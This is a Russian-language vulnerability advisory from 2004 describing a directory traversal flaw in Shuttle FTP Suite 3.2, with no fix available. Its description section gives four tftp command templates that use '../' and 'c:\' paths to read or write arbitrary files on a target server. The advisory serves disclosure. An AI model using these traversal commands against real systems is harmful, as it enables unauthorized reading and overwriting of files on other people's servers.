Удаленный доступ к произвольным файлам в Shuttle FTP Suite

Дата публикации:12.08.2004
Всего просмотров:769
Опасность:
Средняя
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
Обход ограничений безопасности
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Shuttle FTP Suite 3.x
Уязвимые версии: Shuttle FTP Suite 3.2

Описание: Уязвимость обхода каталога обнаружена в Shuttle FTP Suite. Удаленный пользователь может читать и записывать файлы на целевой системе.

Удаленный пользователь может использовать сдедующие tftp команды чтобы записывать или читать произвольные файлы:

 tftp -i [Server_IP] PUT [FileName] ../[FileName]
tftp -i [Server_IP] PUT [FileName] c:\[FileName]
tftp -i [Server_IP] GET ../[FileName]
tftp -i [Server_IP] GET c:\[FileName]

URL производителя: http://www.waveflow.com/shuttleftp/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Shuttle FTP Suite